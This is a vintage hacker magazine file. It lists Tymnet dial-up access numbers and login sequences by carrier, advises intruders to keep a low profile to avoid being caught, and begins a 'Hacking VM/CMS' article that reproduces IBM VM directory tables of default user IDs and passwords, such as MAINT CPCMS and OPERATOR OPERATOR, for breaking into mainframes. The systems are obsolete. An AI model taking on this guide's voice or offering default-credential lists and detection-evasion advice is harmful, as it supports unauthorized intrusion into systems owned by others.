10672 CONNELLSVILLE PENNSYLVANIA 300/1200 412/628-7560 @PDN
|
|
03526 DOWNINGTON/COATES. PENNSYLVANIA 300/1200 215/383-7212 @PDN
|
|
03562 DOYLESTOWN PENNSYLVANIA 300/1200 215/340-0052 @PDN
|
|
03562 GERMANTOWN PENNSYLVANIA 300/1200 215-843-4075 @PDN
|
|
10672 GLENSHAW PENNSYLVANIA 300/1200 412/487-6868 @PDN
|
|
10672 GREENSBURG PENNSYLVANIA 300/1200 412/836-7840 @PDN
|
|
11301 HARRISBURG PENNSYLVANIA 300/1200 717/236-3274 @PDN
|
|
11301 HARRISBURG PENNSYLVANIA 2400 717/238-0450 @PDN
|
|
10672 INDIANA PENNSYLVANIA 300/1200 412/465-7210 @PDN
|
|
03526 KING OF PRUSSIA PENNSYLVANIA 300/1200 215/270-2970 @PDN
|
|
03526 KIRKLYN PENNSYLVANIA 300/1200 215/789-5650 @PDN
|
|
03526 LANSDOWNE PENNSYLVANIA 300/1200 215/626-9001 @PDN
|
|
10672 LATROBE PENNSYLVANIA 300/1200 412/537-0340 @PDN
|
|
11301 LEMOYNE/HARRISBURG PENNSYLVANIA 300/1200 717/236-3274 @PDN
|
|
10672 MCKEESPORT PENNSYLVANIA 300/1200 412/673-6200 @PDN
|
|
10672 NEW CASTLE PENNSYLVANIA 300/1200 412/658-5982 @PDN
|
|
10672 NEW KENSINGTON PENNSYLVANIA 300/1200 412/337-0510 @PDN
|
|
03526 NORRISTOWN PENNSYLVANIA 300/1200 215/270-2970 @PDN
|
|
03526 PAOLI PENNSYLVANIA 300/1200 215/648-0010 @PDN
|
|
03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/923-7792 @PDN
|
|
03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/557-0659 @PDN
|
|
03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/545-7886 @PDN
|
|
03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/677-0321 @PDN
|
|
03562 PHILADELPHIA PENNSYLVANIA 2400 215/625-0770 @PDN
|
|
10672 PITTSBURGH PENNSYLVANIA 300/1200 412/281-8950 @PDN
|
|
10672 PITTSBURGH PENNSYLVANIA 300/1200 412-687-4131 @PDN
|
|
10672 PITTSBURGH PENNSYLVANIA 2400 412/261-9732 @PDN
|
|
10672 POTTSTOWN PENNSYLVANIA 300/1200 215/327-8032 @PDN
|
|
03526 QUAKERTOWN PENNSYLVANIA 300/1200 215/538-7032 @PDN
|
|
03526 READING PENNSYLVANIA 300/1200 215/375-7570 @PDN
|
|
10672 ROCHESTER PENNSYLVANIA 300/1200 412/728-9770 @PDN
|
|
03526 SCRANTON PENNSYLVANIA 300/1200 717/348-1123 @PDN
|
|
03526 SCRANTON PENNSYLVANIA 2400 717/341-1860 @PDN
|
|
10672 SHARON PENNSYLVANIA 300/1200 412/342-1681 @PDN
|
|
03526 TULLYTOWN PENNSYLVANIA 300/1200 215/547-3300 @PDN
|
|
10672 UNIONTOWN PENNSYLVANIA 300/1200 412/437-5640 @PDN
|
|
03562 VALLEY FORGE PENNSYLVANIA 300/1200 215/270-2970 @PDN
|
|
10672 WASHINGTON PENNSYLVANIA 300/1200 412/223-9090 @PDN
|
|
03526 WAYNE PENNSYLVANIA 300/1200 215/341-9605 @PDN
|
|
10672 WILKINSBURG PENNSYLVANIA 300/1200 412/241-1006 @PDN
|
|
|
|
|
|
06254 ALEXANDRIA VIRGINIA 300/1200 703/683-6710 @PDN
|
|
06254 ARLINGTON VIRGINIA 300/1200 703/524-8961 @PDN
|
|
06254 FAIRFAX VIRGINIA 300/1200 703/385-1343 @PDN
|
|
06254 MCLEAN VIRGINIA 300/1200 703/848-2941 @PDN
|
|
|
|
|
|
@PDN BELL ATLANTIC - NETWORK NAME IS PUBLIC DATA NETWORK (PDN)
|
|
|
|
|
|
(CONNECT MESSAGE)
|
|
. _. _. _< _C _R _> _ (SYNCHRONIZES DATA SPEEDS)
|
|
|
|
WELCOME TO THE BPA/DST PDN
|
|
|
|
*. _T _ _< _C _R _> _ (TYMNET ADDRESS)
|
|
|
|
|
|
131069 (ADDRESS CONFIRMATION - TYMNET DNIC)
|
|
COM (CONFIRMATION OF CALL SET-UP)
|
|
|
|
-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
|
|
|
|
|
|
BELL SOUTH
|
|
|
|
NODE CITY STATE DENSITY ACCESS NUMBER MODEM
|
|
----- -------------------- -------------- ------ ------------ -----
|
|
10207 ATLANTA GEORGIA 300/1200 404/261-4633 @PLSK
|
|
10207 ATHENS GEORGIA 300/1200 404/354-0614 @PLSK
|
|
10207 COLUMBUS GEORGIA 300/1200 404/324-5771 @PLSK
|
|
10207 ROME GEORGIA 300/1200 404/234/7542 @PLSK
|
|
|
|
|
|
@PLSK BELLSOUTH - NETWORK NAME IS PULSELINK
|
|
|
|
|
|
(CONNECT MESSAGE)
|
|
|
|
. _. _. _ _< _C _R _> _ (SYNCHRONIZES DATA SPEEDS)
|
|
(DOES NOT ECHO TO THE TERMINAL)
|
|
CONNECTED
|
|
PULSELINK
|
|
|
|
1 _3 _1 _0 _6 _ (TYMNET ADDRESS)
|
|
(DOES NOT ECHO TO THE TERMINAL)
|
|
|
|
PULSELINK: CALL CONNECTED TO 1 3106
|
|
|
|
-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
|
|
|
|
|
|
PACIFIC BELL
|
|
|
|
NODE CITY STATE DENSITY ACCESS NUMBER NTWK
|
|
----- ------------------- -------------- ------ ------------ ----
|
|
03306 BERKELEY CALIFORNIA 300/1200 415-548-2121 @PPS
|
|
06272 EL SEGUNDO CALIFORNIA 300/1200 213-640-8548 @PPS
|
|
06272 FULLERTON CALIFORNIA 300/1200 714-441-2777 @PPS
|
|
06272 INGLEWOOD CALIFORNIA 300/1200 213-216-7667 @PPS
|
|
06272 LOS ANGELES(DOWNTOWN) CALIFORNIA 300/1200 213-687-3727 @PPS
|
|
06272 LOS ANGELES CALIFORNIA 300/1200 213-480-1677 @PPS
|
|
03306 MOUNTAIN VIEW CALIFORNIA 300/1200 415-960-3363 @PPS
|
|
03306 OAKLAND CALIFORNIA 300/1200 415-893-9889 @PPS
|
|
03306 PALO ALTO CALIFORNIA 300/1200 415-325-4666 @PPS
|
|
06272 PASADENA CALIFORNIA 300/1200 818-356-0780 @PPS
|
|
03306 SAN FRANCISCO CALIFORNIA 300/1200 415-543-8275 @PPS
|
|
03306 SAN FRANCISCO CALIFORNIA 300/1200 415-626-5380 @PPS
|
|
03306 SAN FRANCISCO CALIFORNIA 300/1200 415-362-2280 @PPS
|
|
03306 SAN JOSE CALIFORNIA 300/1200 408-920-0888 @PPS
|
|
06272 SANTA ANNA CALIFORNIA 300/1200 714-972-9844 @PPS
|
|
06272 VAN NUYS CALIFORNIA 300/1200 818-780-1066 @PPS
|
|
|
|
|
|
@PPS PACIFIC BELL - NETWORK NAME IS PUBLIC PACKET SWITCHING (PPS)
|
|
|
|
(CONNECT MESSAGE)
|
|
|
|
. _. _. _< _C _R _ (SYNCHRONIZES DATA SPEEDS)>
|
|
(DOES NOT ECHO TO THE TERMINAL)
|
|
|
|
ONLINE 1200
|
|
WELCOME TO PPS: 415-XXX-XXXX
|
|
1 _3 _1 _0 _6 _9 _ (TYMNET ADDRESS)
|
|
(DOES NOT ECHO UNTIL TYMNET RESPONDS)
|
|
|
|
-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
|
|
|
|
SOUTHWESTERN BELL
|
|
|
|
NODE CITY STATE DENSITY ACCESS NUMBERS NWRK
|
|
----- -------------------- -------------- ------- ------------ -----
|
|
05443 KANSAS CITY KANSAS 300/1200 316/225-9951 @MRLK
|
|
05443 HAYS KANSAS 300/1200 913/625-8100 @MRLK
|
|
05443 HUTCHINSON KANSAS 300/1200 316/669-1052 @MRLK
|
|
05443 LAWRENCE KANSAS 300/1200 913/841-5580 @MRLK
|
|
05443 MANHATTAN KANSAS 300/1200 913/539-9291 @MRLK
|
|
05443 PARSONS KANSAS 300/1200 316/421-0620 @MRLK
|
|
05443 SALINA KANSAS 300/1200 913/825-4547 @MRLK
|
|
05443 TOPEKA KANSAS 300/1200 913/235-1909 @MRLK
|
|
05443 WICHITA KANSAS 300/1200 316/269-1996 @MRLK
|
|
|
|
|
|
04766 BRIDGETON/ST. LOUIS MISSOURI 300/1200 314/622-0900 @MRLK
|
|
04766 ST. LOUIS MISSOURI 300/1200 314/622-0900 @MRLK
|
|
|
|
|
|
06510 ADA OKLAHOMA 300/1200 405/436-0252 @MRLK
|
|
06510 ALTUS OKLAHOMA 300/1200 405/477-0321 @MRLK
|
|
06510 ALVA OKLAHOMA 300/1200 405/327-1441 @MRLK
|
|
06510 ARDMORE OKLAHOMA 300/1200 405/223-8086 @MRLK
|
|
03167 BARTLESVILLE OKLAHOMA 300/1200 918/336-6901 @MRLK
|
|
06510 CLINTON OKLAHOMA 300/1200 405/323-8102 @MRLK
|
|
06510 DURANT OKLAHOMA 300/1200 405/924-2680 @MRLK
|
|
06510 ENID OKLAHOMA 300/1200 405/242-8221 @MRLK
|
|
06510 LAWTON OKLAHOMA 300/1200 405/248-8772 @MRLK
|
|
03167 MCALESTER OKLAHOMA 300/1200 918/426-0900 @MRLK
|
|
03167 MIAMI OKLAHOMA 300/1200 918/540-1551 @MRLK
|
|
03167 MUSKOGEE OKLAHOMA 300/1200 918/683-1114 @MRLK
|
|
06510 OKLAHOMA CITY OKLAHOMA 300/1200 405/236-0660 @MRLK
|
|
06510 PONCA CITY OKLAHOMA 300/1200 405/762-9926 @MRLK
|
|
03167 SALLISAW OKLAHOMA 300/1200 918/775-7713 @MRLK
|
|
06510 SHAWNEE OKLAHOMA 300/1200 405/273-0053 @MRLK
|
|
06510 STILLWATER OKLAHOMA 300/1200 405/377-5500 @MRLK
|
|
03167 TULSA OKLAHOMA 300/1200 918/583-6606 @MRLK
|
|
06510 WOODWARD OKLAHOMA 300/1200 405/256-9947 @MRLK
|
|
|
|
|
|
|
|
|
|
@MRLK - SOUTHWESTERN BELL TELEPHONE- NETWORK NAME IS MICROLINK II(R)
|
|
|
|
(CONNECT MESSAGE)
|
|
(PLEASE TYPE YOUR TERMINAL IDENTIFIER)
|
|
|
|
A _ (YOUR TERMINAL IDENTIFIER)
|
|
|
|
WELCOME TO MICROLINK II
|
|
-XXXX:01-030-
|
|
PLEASE LOG IN:
|
|
.T < _C _R _> _ (USERNAME TO ACCESS TYMNET)
|
|
|
|
|
|
HOST: CALL CONNECTED
|
|
|
|
-GWY 0XXXX- TYMNET: PLEASE LOG IN:
|
|
|
|
|
|
SOUTHERN NEW ENGLAND
|
|
|
|
NODE CITY STATE DENSITY ACCESS NUMBERS NWRK
|
|
----- ------------------- ----------- ------- -------------- -----
|
|
02727 BRIDGEPORT CONNECTICUT 300/2400 203/366-6972 @CONNNET
|
|
02727 BRISTOL CONNECTICUT 300/2400 203/589-5100 @CONNNET
|
|
02727 CANAAN CONNECTICUT 300/2400 203/824-5103 @CONNNET
|
|
02727 CLINTON CONNECTICUT 300/2400 203/669-4243 @CONNNET
|
|
02727 DANBURY CONNECTICUT 300/2400 203/743-2906 @CONNNET
|
|
02727 DANIELSON CONNECTICUT 300/2400 203/779-1880 @CONNNET
|
|
02727 HARTFORD/MIDDLETOWN CONNECTICUT 300/2400 203/724-6219 @CONNNET
|
|
02727 MERIDEN CONNECTICUT 300/2400 203/237-3460 @CONNNET
|
|
02727 NEW HAVEN CONNECTICUT 300/2400 203/776-1142 @CONNNET
|
|
02727 NEW LONDON CONNECTICUT 300/2400 203/443-0884 @CONNNET
|
|
02727 NEW MILFORD CONNECTICUT 300/2400 203/355-0764 @CONNNET
|
|
02727 NORWALK CONNECTICUT 300/2400 203/866-5305 @CONNNET
|
|
02727 OLD GREDDWICH CONNNETICUT 300/2400 203/637-8872 @CONNNET
|
|
02727 OLD SAYBROOK CONNECTICUT 300/2400 203/388-0778 @CONNNET
|
|
02727 SEYMOUR CONNECTICUT 300/2400 203/881-1455 @CONNNET
|
|
02727 STAMFORD CONNECTICUT 300/2400 203/324-9701 @CONNNET
|
|
02727 STORRS CONNECTICUT 300/2400 203/429-4243 @CONNNET
|
|
02727 TORRINGTON CONNECTICUT 300/2400 203/482-9849 @CONNNET
|
|
02727 WATERBURY CONNECTICUT 300/2400 203/597-0064 @CONNNET
|
|
02727 WILLIMANTIC CONNECTICUT 300/2400 203/456-4552 @CONNNET
|
|
02727 WINDSOR CONNECTICUT 300/2400 203/688-9330 @CONNNET
|
|
02727 WINDSOR LCKS/ENFIELD CONNECTICUT 300/2400 203/623-9804 @CONNNET
|
|
|
|
|
|
|
|
@CONNNET - SOUTHERN NEW ENGLAND TELEPHONE - NETWORK NAME IN CONNNET
|
|
|
|
(CONNECT MESSAGE)
|
|
|
|
H_ H_ <_ C_ R_> (SYNCHRONIZES DATA SPEEDS)
|
|
(DOES NOT ECHO TO THE TERMINAL)
|
|
CONNNET
|
|
|
|
._ T_ <_ C_ R_>_ (MUST BE CAPITAL LETTERS)
|
|
|
|
26-SEP-88 18:33 (DATA)
|
|
031069 (ADDRESS CONFIRMATION)
|
|
COM (CONFIRMATION OF CALL SET-UP)
|
|
|
|
-GWY OXXXX-TYMNET: PLEASE LOG IN:
|
|
|
|
On a side note, the recent book The Cuckoo's Egg provides some interesting
|
|
information (in the form of a story, however) on a Tymnet hacker. Remember
|
|
that he was into BIG things, and hence he was cracked down upon. If you keep a
|
|
low profile, networks should provide a good access method.
|
|
|
|
If you can find a system that is connected to the Internet that you can get on
|
|
from Tymnet, you are doing well.
|
|
_______________________________________________________________________________
|
|
==Phrack Inc.==
|
|
|
|
Volume Three, Issue 30, File #4 of 12
|
|
|
|
|
|
/===================================\
|
|
| |
|
|
| Hacking VM/CMS |
|
|
| |
|
|
| |
|
|
| by Goe |
|
|
| |
|
|
\===================================/
|
|
|
|
|
|
This file written by Goe (my nickname). Any comments or criticisms or
|
|
corrections are welcomed. Anyone with a good knowledge can modify this.
|
|
|
|
The article's topic is the IBM VM/SP running CMS and using DIRMAINT. I do not
|
|
know if it works in MVS/TSO or VSE.
|
|
|
|
The first table contains the original default IDs & passwords from IBM Corp.
|
|
|
|
The second table contains those default IDs & passwords that IBM customized for
|
|
its customer.
|
|
|
|
===============================================================================
|
|
|
|
***************************************************************
|
|
* 3380 SYSTEM DIRECTORY *
|
|
***************************************************************
|
|
* *
|
|
* The addresses 123, 124, and 125 are virtual ad- *
|
|
* dresses. The address 123 is critical since it is *
|
|
* used in DMKSYS, the directory, and the service en- *
|
|
* vironments of the Interactive Productivity Facil- *
|
|
* ity. Do not change this address. If you still want *
|
|
* to change it, remember it must be changed in *
|
|
* DMKSYS, all service environments, the 'DIRECTORY' *
|
|
* statement below, and in the 'MDISK' statements *
|
|
* found under the userid 'MAINT'. *
|
|
* *
|
|
* NOTE: Remember these are only virtual addresses *
|
|
* not real addresses, so there is no need to change *
|
|
* them to match your hardware addresses. More in- *
|
|
* formation is contained in the system Installation *
|
|
* Guide. *
|
|
* *
|
|
***************************************************************
|
|
*
|
|
DIRECTORY 123 3380 VMSRES
|
|
*
|
|
***************************************************************
|
|
* 3380 SYSTEM RESERVED AREAS (NOT FOR MINIDISKS) *
|
|
***************************************************************
|
|
*
|
|
USER $ALLOC$ NOLOG
|
|
MDISK A01 3380 000 001 VMSRES R
|
|
MDISK B01 3380 000 001 VMPK01 R
|
|
MDISK E01 3380 000 001 VMPK04 R
|
|
MDISK F11 3380 000 001 PROFPK R
|
|
MDISK F21 3380 000 001 SQLPK R
|
|
*
|
|
USER $TEMP$ NOLOG
|
|
MDISK A09 3380 272 228 VMSRES R
|
|
MDISK D09 3380 277 258 VMPK01
|
|
*
|
|
USER $TDISK$ NOLOG
|
|
MDISK A08 3380 585 091 VMSRES R
|
|
*
|
|
USER $CPNUC$ NOLOG
|
|
MDISK A02 3380 001 005 VMSRES R
|
|
*
|
|
USER $DIRECT$ NOLOG
|
|
MDISK A03 3380 500 002 VMSRES R
|
|
*
|
|
USER $SAVSYS$ NOLOG
|
|
MDISK A04 3380 006 011 VMSRES R
|
|
MDISK B04 3380 012 056 VMPK01 R
|
|
*
|
|
USER $SYSERR$ NOLOG
|
|
MDISK A06 3380 019 002 VMSRES R
|
|
*
|
|
USER $SYSCKP$ NOLOG
|
|
MDISK A05 3380 271 001 VMSRES R
|
|
*
|
|
USER $SYSWRM$ NOLOG
|
|
MDISK A07 3380 017 002 VMSRES R
|
|
*
|
|
***************************************************************
|
|
* SYSTEM RELATED USERIDS *
|
|
***************************************************************
|
|
*
|
|
USER AUTOLOG1 NOLOG 512K 1M ABCDEG
|
|
ACCOUNT 2 SYSTEM
|
|
IPL CMS PARM AUTOCR
|
|
CONSOLE 009 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 19E 19E RR
|
|
MDISK 191 3380 093 001 VMPK01 MR RAUTOLOG WAUTOLOG MAUTOLOG
|
|
*
|
|
USER CMSBATCH NOLOG 1M 2M G
|
|
ACCOUNT 3 SYSTEM
|
|
OPTION ACCT
|
|
IPL CMS PARM AUTOCR
|
|
CONSOLE 009 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
MDISK 195 3380 068 002 VMPK01 MR RBATCH WBATCH MBATCH
|
|
*
|
|
USER CMSUSER NOLOG 1M 3M G
|
|
ACCOUNT 101 USER01
|
|
IPL CMS
|
|
CONSOLE 009 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 19E 19E RR
|
|
MDISK 191 3380 089 003 VMPK01 MR RCMS WCMS MCMS
|
|
*
|
|
USER EREP NOLOG 768K 2M FG
|
|
ACCOUNT EREP IBMCE
|
|
IPL CMS
|
|
CONSOLE 01F 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 19E 19E RR
|
|
LINK MAINT 201 192 RR
|
|
MDISK 191 3380 027 001 VMSRES WR READ WRITE
|
|
*
|
|
USER GCS NOLOG 5M 6M G
|
|
ACCOUNT GCS RECVM
|
|
OPTION ECMODE DIAG98
|
|
IPL GCS PARM AUTOLOG
|
|
CONSOLE 009 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 595 595 RR
|
|
LINK MAINT 59E 59E RR
|
|
MDISK 191 3380 677 005 VMPK01 MR RGCS WGCS MGCS
|
|
*
|
|
USER IVPM1 NOLOG 3M 16M G
|
|
ACCOUNT ACT4 IVPM1
|
|
CONSOLE 009 3210
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 193 193 RR
|
|
LINK MAINT 194 194 RR
|
|
LINK MAINT 19D 19D RR
|
|
MDISK 191 3380 883 001 VMSRES WR READ WRITE
|
|
*
|
|
USER IVPM2 NOLOG 3M 4M G
|
|
ACCOUNT ACT5 IVPM2
|
|
CONSOLE 009 3210
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 193 193 RR
|
|
LINK MAINT 194 194 RR
|
|
LINK MAINT 19D 19D RR
|
|
MDISK 191 3380 884 001 VMSRES WR READ WRITE
|
|
*
|
|
USER MAINT CPCMS 16M 16M ABCDEFG
|
|
ACCOUNT 1 SYSPROG
|
|
OPTION ECMODE DIAG98
|
|
IPL 190
|
|
CONSOLE 009 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
MDISK 123 3380 000 885 VMSRES MW RSYSRES WSYSRES MSYSRES
|
|
MDISK 124 3380 000 885 VMPK01 MW RSYSRES WSYSRES MSYSRES
|
|
MDISK 127 3380 000 885 VMPK04 MW RSYSRES WSYSRES MSYSRES
|
|
MDISK 129 3380 000 885 PROFPK MW RSYSRES WSYSRES MSYSRES
|
|
MDISK 130 3380 000 885 SQLPK MW RSYSRES WSYSRES MSYSRES
|
|
MDISK 19D 3380 229 048 VMPK01 MW ALL WMAINT MMAINT
|
|
MDISK 190 3380 502 037 VMSRES MW ALL WMAINT MMAINT
|
|
MDISK 191 3380 144 010 VMSRES MW RMAINT WMAINT MMAINT
|
|
MDISK 193 3380 117 027 VMSRES MW RMAINT WMAINT MMAINT
|
|
MDISK 194 3380 044 027 VMSRES MW RMAINT WMAINT MMAINT
|
|
MDISK 196 3380 028 016 VMSRES MW RMAINT WMAINT MMAINT
|
|
MDISK 201 3380 767 023 VMSRES MW RMAINT WMAINT MMAINT
|
|
MDISK 293 3380 790 027 VMSRES MW RCMSAUX WCMSAUX MCMSAUX
|
|
MDISK 294 3380 862 021 VMSRES MW RCPAUX WCPAUX MCPAUX
|
|
MDISK 295 3380 211 014 VMSRES MW RUSRMOD WUSRMOD MUSRMOD
|
|
MDISK 296 3380 070 019 VMPK01 MW RCPAUX WCPAUX MCPAUX
|
|
MDISK 319 3380 021 006 VMSRES MW ALL WMAINT MMAINT
|
|
MDISK 393 3380 353 063 VMPK04 WR RMAINT WMAINT
|
|
MDISK 394 3380 416 076 VMPK04 WR RMAINT WMAINT
|
|
MDISK 396 3380 499 034 VMPK04 WR RMAINT WMAINT
|
|
MDISK 492 3380 664 011 VMPK01 MW RTSFOBJ WTSFOBJ MTSFOBJ
|
|
MDISK 494 3380 864 011 VMPK01 MW RTSFAUX WTSFAUX MTSFAUX
|
|
MDISK 496 3380 092 001 VMPK01 MW RIPCX WIPCSX MIPSX
|
|
MDISK 497 3380 492 007 VMPK04 MW RMAINT WMAINT
|
|
MDISK 59E 3380 875 010 VMPK01 MW ALL WMAINT MMAINT
|
|
MDISK 595 3380 682 031 VMPK01 MW RMAINT WMAINT MMAINT
|
|
MDISK 596 3380 713 021 VMPK01 MW RGCSAUX WGCSAUX MGCSAUX
|
|
*
|
|
USER OLTSEP NOLOG 1M 1M FG
|
|
ACCOUNT OLTSEP IBMCE
|
|
OPTION REALTIMER ECMODE
|
|
IPL 5FF
|
|
CONSOLE 01F 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 19D 19D RR
|
|
MDISK 5FF 3380 000 885 CEPACK MR READ WRITE
|
|
*
|
|
USER OPERATNS NOLOG 1M 2M BCEG
|
|
ACCOUNT 13 SYSPROG
|
|
IPL CMS
|
|
CONSOLE 009 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 19E 19E RR
|
|
MDISK 191 3380 154 001 VMSRES MR RIPCS WIPCS MIPCS
|
|
MDISK 193 3380 201 008 VMSRES MR RIPCS WIPCS MIPCS
|
|
*
|
|
USER OPERATOR OPERATOR 3M 16M ABCDEFG
|
|
ACCOUNT 2 OPERATOR
|
|
CONSOLE 009 3215 T MAINT
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 19E 19E RR
|
|
MDISK 191 3380 209 002 VMSRES MR ROPER WOPER MOPER
|
|
*
|
|
USER SYSDUMP1 NOLOG 1M 1M BG
|
|
ACCOUNT 16 SYSTEM
|
|
IPL CMS
|
|
CONSOLE 009 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 19E 19E RR
|
|
MDISK 123 3380 000 885 VMSRES RR
|
|
MDISK 124 3380 000 885 VMPK01 RR
|
|
MDISK 127 3380 000 885 VMPK04 RR
|
|
MDISK 129 3380 000 885 PROFPK RR
|
|
MDISK 130 3380 000 885 SQLPK RR
|
|
*
|
|
USER TSAFVM NOLOG 4M 8M G
|
|
ACCOUNT 1 xxxxxx
|
|
OPTION MAXCONN 256 BMX ECMODE COMSRV ACCT CONCEAL REALTIMER
|
|
IUCV ALLOW
|
|
IUCV *CRM
|
|
IPL CMS PARM AUTOCR
|
|
CONSOLE 009 3215 A OPERATOR
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 19E 19E RR
|
|
LINK MAINT 492 192 RR
|
|
LINK MAINT 494 494 RR
|
|
MDISK 191 3380 675 002 VMPK01 MR
|
|
DEDICATE 300 4A0
|
|
*
|
|
|
|
===============================================================================
|
|
|
|
***************************************************************
|
|
* 3380 SYSTEM DIRECTORY *
|
|
***************************************************************
|
|
* *
|
|
* The virtual address 123 is critical since it is *
|
|
* used in DMKSYS, the directory, and the service en- *
|
|
* vironments of the Interactive Productivity Facil- *
|
|
* ity. Do not change this address. If you still want *
|
|
* to change it, remember it must be changed in *
|
|
* DMKSYS, all service environments, the 'DIRECTORY' *
|
|
* statement below, and in the 'MDISK' statements *
|
|
* found under the userid 'MAINT'. *
|
|
* *
|
|
* NOTE: Remember these are only virtual addresses *
|
|
* not real addresses, so there is no need to change *
|
|
* them to match your hardware addresses. More in- *
|
|
* formation is contained in the system Installation *
|
|
* Guide. *
|
|
* *
|
|
***************************************************************
|
|
*
|
|
DIRECTORY 123 3380 VMSRES
|
|
*
|
|
***************************************************************
|
|
* EXPRESS STANDARD PROFILE FOR GENERAL PURPOSE USERIDS *
|
|
***************************************************************
|
|
*
|
|
PROFILE EXPPROF
|
|
IPL CMS PARM AUTOCR
|
|
CONSOLE 009 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
LINK MAINT 19D 19D RR
|
|
LINK MAINT 19E 19E RR
|
|
*
|
|
***************************************************************
|
|
* 3380 SYSTEM RESERVED AREAS (NOT FOR MINIDISKS) *
|
|
***************************************************************
|
|
*
|
|
USER $ALLOC$ NOLOG
|
|
MDISK A01 3380 000 001 VMSRES R 03131808
|
|
MDISK A02 3380 000 001 VMGCS1 R 03131808
|
|
MDISK A05 3380 000 001 VMPK01 R 03131808
|
|
MDISK A06 3380 000 001 VMSTGE R 03131808
|
|
MDISK A07 3380 000 001 PROFPK R 03131808
|
|
MDISK A08 3380 000 001 SQLPK R 03131808
|
|
MDISK A09 3380 000 001 VMPK02 R 03131808
|
|
MDISK A0A 3380 000 001 EDMD01 R 03131808
|
|
*
|
|
USER $TEMP$ NOLOG
|
|
MDISK B01 3380 392 100 VMSRES R 03131808
|
|
MDISK B02 3380 392 100 VMPK01 R 03131808
|
|
*
|
|
USER $TDISK$ NOLOG
|
|
MDISK C01 3380 358 033 VMSRES R 03131808
|
|
MDISK C02 3380 492 022 VMPK01 R 03131808
|
|
*
|
|
USER $CPNUC$ NOLOG
|
|
MDISK D01 3380 001 005 VMSRES R 03131808
|
|
*
|
|
USER $DIRECT$ NOLOG
|
|
MDISK E01 3380 492 002 VMSRES R 03131808
|
|
*
|
|
USER $SAVSYS$ NOLOG
|
|
MDISK F01 3380 006 011 VMSRES R 03131808
|
|
MDISK F02 3380 012 060 VMPK01 R 03131808
|
|
*
|
|
USER $SYSERR$ NOLOG
|
|
MDISK F03 3380 019 002 VMSRES R 03131808
|
|
*
|
|
USER $SYSCKP$ NOLOG
|
|
MDISK F04 3380 391 001 VMSRES R 03131808
|
|
*
|
|
USER $SYSWRM$ NOLOG
|
|
MDISK F05 3380 017 002 VMSRES R 03131808
|
|
*
|
|
***************************************************************
|
|
* SYSTEM RELATED USERIDS *
|
|
***************************************************************
|
|
*
|
|
USER AUTOLOG1 AUTOLOG1 512K 1M ABCDEG
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 2 SYSTEM
|
|
MDISK 191 3380 094 001 VMPK01 MR RAUTOLOG WAUTOLOG MAUTOLOG 03131808
|
|
*
|
|
USER CMSBATCH CMSBATCH 1M 2M G
|
|
ACCOUNT 3 SYSTEM
|
|
OPTION ACCT
|
|
IPL CMS PARM AUTOCR
|
|
CONSOLE 009 3215
|
|
SPOOL 00C 2540 READER *
|
|
SPOOL 00D 2540 PUNCH A
|
|
SPOOL 00E 1403 A
|
|
LINK MAINT 190 190 RR
|
|
MDISK 195 3380 095 002 VMPK01 MR RBATCH WBATCH MBATCH 03131808
|
|
*
|
|
USER CMSUSER CMSUSER 1M 3M G
|
|
INCLUDE EXPPROF
|
|
ACCOUNT 101 USER01
|
|
MDISK 191 3380 091 003 VMPK01 MR RCMS WCMS MCMS 03131808
|
|
*
|
|
USER EREP EREP 768K 2M FG
|
|
INCLUDE EXPPROF
|
|
